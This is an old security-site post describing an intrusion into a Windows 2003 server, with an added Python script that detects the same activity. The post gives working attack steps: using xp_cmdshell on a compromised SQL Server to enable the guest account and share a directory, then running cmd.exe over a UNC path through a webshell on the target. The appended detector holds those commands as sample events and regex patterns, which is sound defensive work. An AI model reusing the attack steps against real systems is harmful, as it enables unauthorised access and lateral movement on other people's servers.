Clever use of file sharing in a WEBSHELL to execute system commands

2006-01-19T00:00:00
ID MYHACK58:6220066492
Type myhack58
Reporter Anonymous
Modified 2006-01-19T00:00:00

Description

Recently, while intruding into a Win2003 host, I found that by default the cmd.exe that comes with the system could not be used to execute system commands, and uploading a cmd.exe file failed because the file was too large. I then uploaded the cmd.exe file successfully through a file share on an adjacent machine. The specific process is as follows. We have acquired administrator privileges on the adjacent machine 192.168.1.1 and use SQL's xp_cmdshell command to execute the following operations:

net user guest /active:yes
(enables the guest user to allow anonymous access to the file share)

net share web=d:\web
(shares the WEB directory)

Then, in the WEBSHELL on the target machine, enter the following: \\192.168.1.1\web\cmd.exe

Finally, with the SHELL path in the figure at c:\in cmd.exe, operating system commands run normally.

Since cmd.exe can be uploaded to the server once it is packed, I suggest that some expert write an ASP-based RAR decompression tool to make it easy to upload the cmd.exe program on a 2003 server.
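Detection of the behaviour described above, as an added example that is not part of the original post: it flags a web worker process starting a binary from a UNC path, and SQL Server spawning the guest-enable and share-creation commands. The records are constructed samples using the Image, CommandLine and ParentImage fields of Sysmon process-creation events; host names, rule names and the worker-process list are assumptions.

```python
import re

# Constructed process-creation records (illustrative, not taken from the post).
SQL = r"C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe"
SAMPLE_EVENTS = [
    {"host": "WEB01", "ParentImage": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "Image": r"\\192.168.1.1\web\cmd.exe",
     "CommandLine": r"\\192.168.1.1\web\cmd.exe /c whoami"},
    {"host": "SQL01", "ParentImage": SQL, "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'"cmd.exe" /c net user guest /active:yes'},
    {"host": "SQL01", "ParentImage": SQL, "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'"cmd.exe" /c net share web=d:\web'},
    {"host": "WEB01", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\notepad.exe", "CommandLine": "notepad.exe"},
]

# Assumed list of IIS worker process names; extend it for your environment.
WEB_WORKERS = {"w3wp.exe", "inetinfo.exe"}
GUEST_ENABLE = re.compile(r"\bnet1?(\.exe)?\s+user\s+guest\b.*?/active:yes", re.I)
SHARE_CREATE = re.compile(r"\bnet1?(\.exe)?\s+share\s+\S+=", re.I)


def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect(event):
    """Return the names of the rules that match one process-creation record."""
    findings = []
    parent = basename(event["ParentImage"])
    # A web worker should not start executables that live on a network share.
    if parent in WEB_WORKERS and event["Image"].startswith("\\\\"):
        findings.append("web-worker-ran-binary-from-unc-path")
    # xp_cmdshell runs its argument through cmd.exe as a child of sqlservr.exe.
    if parent == "sqlservr.exe":
        if GUEST_ENABLE.search(event["CommandLine"]):
            findings.append("sql-server-enabled-guest-account")
        if SHARE_CREATE.search(event["CommandLine"]):
            findings.append("sql-server-created-share")
    return findings


def scan(events):
    """Return (host, rule) pairs for every match in a list of records."""
    return [(e["host"], f) for e in events for f in detect(e)]


if __name__ == "__main__":
    for host, finding in scan(SAMPLE_EVENTS):
        print(host, finding)
```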